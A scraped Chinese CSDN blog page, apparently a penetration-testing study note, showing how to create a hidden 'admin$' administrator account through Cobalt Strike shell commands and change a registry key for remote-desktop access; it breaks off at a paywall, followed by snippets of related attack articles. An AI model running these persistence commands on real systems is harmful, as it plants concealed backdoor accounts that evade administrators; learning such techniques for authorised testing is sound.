内网渗透--远程桌面

最新推荐文章于 2024-04-29 12:47:16 发布
最新推荐文章于 2024-04-29 12:47:16 发布
阅读量669 收藏 4
点赞数
分类专栏: 内网 文章标签: windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_31065143/article/details/116273804
版权
本文介绍了如何在Windows内网环境中进行渗透测试,特别是通过远程桌面隐藏用户admin$的创建和管理。首先创建带"$"符号的admin$用户并将其添加到管理员组,然后通过修改注册表权限来隐藏该用户,最后解决远程桌面连接问题。
摘要由CSDN通过智能技术生成

内网渗透–远程桌面

前言

学代码审计有些枯燥,加上俺内网啥也不会,学学内网换换口味。

隐藏用户的创建

因为在Windows环境下创建用户后面如果带入一个“$"符号,在net user时默认是不显示的。

利用条件:获得管理员权限

首先在cs中输入以下命令

shell net user admin$ 123456 /add

shell net localgroup administrators admin$ /add

第一句是创建一个admin$用户密码为123456.第二句是将用户加入管理组。

我们来验证一下,使用net user命令并无admin用户

然后远程打开3389端口。

reg add “HKLM\SYSTEM\CURRENT\CONTROLSET\CONTROL\TERMINAL SERVER” /v fSingleSessionPerUser /t REG_DWORD /d 0 /f

现在已经可以远程连接了,但是中用户组中依然可以看见admin$

最低0.47元/天 解锁文章
pyshare
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
搭建局域网环境的CS结构-实现远程桌面访问- 实现远程共享访问
l578900的博客
08-04 1116
搭建局域网环境的CS结构 虚拟机-设置-更改网络适配器-选择自定义vmnet1仅主机模式-搭建局域网 必须关闭防火墙,否则ping不通 客户端也重复上述步骤,然后互相ping,即可ping通 实现远程桌面访问 首先必须在系统属性中选择允许远程连接 win+R 输入mstsc 输入用户名密码 连接后即可控制服务器的桌面,在桌面新建了一个文件夹。 在服务器这边查看文件夹存在,操作成功。 实现远程共享访问 win+R 输入 \ \服务器的ip地址\c$ ...
内网渗透|后渗透之远程桌面
weixin_43718688的博客
05-06 1343
内网渗透|后渗透之远程桌面 0x00 前言 在渗透过程中拿下一台主机后很多时候会选择开3389进远程桌面查看一下对方主机内有无一些有价值的东西可以利用,但是这也引出了一个问题,只要是登录进程就一定会留下痕迹,虽然在渗透完成后可以通过痕迹清理的方法清除自己登录的"证据",但是在多次渗透的过程中我不禁产生了思考,有没有一种方法能够最大化的隐藏自己登陆过对方主机呢,于是便有了下文。 0x01 隐藏用户(影子用户)的创建与利用进行权限维持 这里先提一个概念,在windows环境下创建用户如果后面带了一个 DOLLA
红日实战——使用CS拿下域内主机
a2106883567的博客
09-22 179
其中win7作为web服务器来使用,与其他两个电脑都在内网中,并且可以互相访问。Kali自带了arp扫描器,可以通过这个工具扫描出和自身网卡同一网段的主机。这里使用phpmyadmin日志写shell,先查看有没有开启日志。可以看到没有开启,并且secure_file_priv没有具体值。含有两个网卡,其中一个为VM13为内网,另一个为NAT连接外网。使用root权限进行扫描,很快就可以发现在同一个网段下的主机。可以看到内网之间的主机互通,而外网访问不了内网。arp-scan -l #扫描网段所有主机。
使用CSgetshell到3389端口远程桌面
carrot11223的博客
04-29 434
中间使用了这个Akagi64.exe提权,网上可以找到,高版本的cs网上也可以找到。
【内网安全】Cobalt Strike 使用
qq_44657899的博客
07-12 2282
文章目录Beacon命令argue参数污染 Beacon命令 argue参数污染 argue net1 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx Argue execute net1 user test test123 /add execute net1 localgroup administrators test /add argue 进程参数欺骗 argue [command] [fake arguments] argue 命令 假参数 欺骗某个命令参数 argue [com
AHZY-内网安全攻防2020-01-12 内网安全攻防知识分享,
08-20
8. **远程连接服务**:启用远程桌面连接服务(RDP)可以通过`reg query`和`wmic`命令来查询和设置端口号,确保安全设置到位。 9. **安全策略**:了解并实施安全策略,如限制不必要的服务、更新系统补丁(通过`...
钉钉的全免费内网渗透服务客户端
06-06
【钉钉全免费内网渗透服务客户端】是针对企业内部网络环境进行安全检测与防护的一款工具,主要用于帮助企业发现并修复网络安全漏洞。这款客户端基于Web技术,意味着用户可以通过浏览器访问和管理,无需安装额外的...
强大的内网渗透辅助工具集-让Yasso像风一样 支持rdp,ssh,redis,postgres,mongodb,m.zip
03-07
RDP 是微软提供的远程桌面服务,允许用户通过网络访问图形化的Windows桌面环境。RDP的常见安全风险包括弱密码、未授权访问等。Yasso 支持 RDP 意味着可以进行 RDP 服务的扫描,识别潜在的漏洞,并尝试进行安全测试...
内网渗透课实验—传输层隧道通信.docx
08-29
Windows 主机上,我们需要开启远程桌面服务,以便 kali Linux 可以远程连接。在 kali Linux 上,我们可以使用 netstat -lnt 命令来查看当前的网络端口情况。 在传输层隧道通信中,我们可以使用 powercat 和 ...
隐藏账户实验.docx
03-09
【网络安全与内网渗透】——隐藏账户的创建、检测与防范 在网络安全领域,了解如何隐藏账户以及如何防范此类威胁是至关重要的。隐藏账户通常被恶意攻击者用来规避系统管理员的监控,以便在系统中执行非法操作。在这...
nps:一款轻量级、高性能、功能强大的内网穿透代理服务器。支持tcp、udp、socks5、http等几乎所有流量转发,可用来访问内网网站、本地支付接口调试、ssh访问、远程桌面,内网dns解析、内网socks5代理等等……,并带有功能强大的web管理端。a lightweight, high-performance, powerful intranet penetration proxy server, with a powerful web management terminal
05-12
NPS是具有功能强大的Web管理终端的轻型,高性能,功能强大的Intranet渗透代理服务器。 特征 全面的协议支持,与几乎所有常用协议兼容,例如tcp,udp,http(s),socks5,p2p,http代理... 全面的平台兼容性(Linux...
frp 0.33.0(windows x86)
最新发布
07-21
FRP(Fast Reverse Proxy)是一个开源、简洁易用、高性能...远程桌面访问:通过FRP将内网的远程桌面服务暴露到公网。 文件共享:通过FRP实现内网文件共享服务的外网访问。 SSH访问:通过FRP实现内网SSH服务的外网访问。
meterpreter模块之后渗透攻击实战总结.docx
07-10
关闭杀毒软件可以使用`killav`命令,开启远程桌面协议(RDP)则通过`enable_rdp`和`getgui`完成。 4. **会话管理**:`background`将当前会话放入后台,便于执行其他操作。`portfwd`用于端口转发,如将目标的3389端口...
第二十七课:基于MSF发现内网存活主机第五季.docx
09-15
4. `auxiliary/scanner/rdp/rdp_scanner` - RDP扫描,针对远程桌面协议的扫描。 5. `auxiliary/scanner/smtp/smtp_version` - SMTP版本扫描,获取SMTP服务器的版本信息。 第五季: 1. `auxiliary/scanner/pop3/pop3...
渗透小技巧从getshell到3389端口远程桌面连接靶机
热门推荐
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
12-16 1万+
渗透或平时比赛中还在为自己命令行操作不熟而感到烦恼吗?直接命令行方式启动远程桌面连接,让效率提高。
远程桌面】Dell机器登陆与退出远程桌面
小白兔的窝
11-30 2291
进入远程桌面:Ctrl+R->mstsc退出远程桌面:快捷键。 有”Break键“的机器:Ctrl+Alt+Break 没有“Break”键的笔记本:通过“Fn+b”实现“Break”的功能,即Ctrl+Alt+Fn+Break。 没有“Break”键的Dell笔记本:通过“Fn+Insert”实现“Break”的功能,即Ctrl+Alt+Fn+Insert。 没有“Break”的Dell台式机:
渗透技巧——从远程桌面客户端提取明文凭据
systemino的博客
11-22 2498
0x00 前言 在之前的文章《渗透技巧——获得Windows系统的远程桌面连接历史记录》曾介绍了获得远程桌面连接历史记录的方法。 在实际的渗透过程中,如果发现了远程桌面连接的历史记录,奇热那么下一步就需要想办法获取远程桌面连接使用的口令。 本文将会结合RdpThief介绍从远程桌面客户端提取明文凭据的方法,分享需要注意的细节。 RdpThief地址: https://github.com...
内网渗透--ICMP隧道
05-16
ICMP隧道是一种利用Internet控制消息协议(ICMP)的技术,将其他协议的数据包封装在ICMP数据包中,从而在不被检测的情况下在网络中传输数据。对于内网渗透而言,ICMP隧道可以用于将攻击者的数据从受害主机中转出,绕过防火墙和其他网络安全设备的检测和过滤。 ICMP隧道的实现需要两个端点:一个客户端和一个服务器端。客户端将要传输的数据封装在ICMP数据包中发送给服务器端,服务器端接收到ICMP数据包后解析其中的数据,然后将数据还原成原始数据包,再转发给目标主机。通过这种方式,攻击者可以在内网中传输各种类型的数据,包括命令和控制信息。 然而,ICMP隧道也有缺点。由于ICMP数据包通常被认为是网络的一部分,因此可能不会被网络安全设备视为可疑流量。然而,如果攻击者的网络流量被监测到,这种技术可能被检测出来,因此需要谨慎使用。此外,ICMP隧道还可能会导致网络延迟和丢包等问题,影响传输速度和数据完整性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值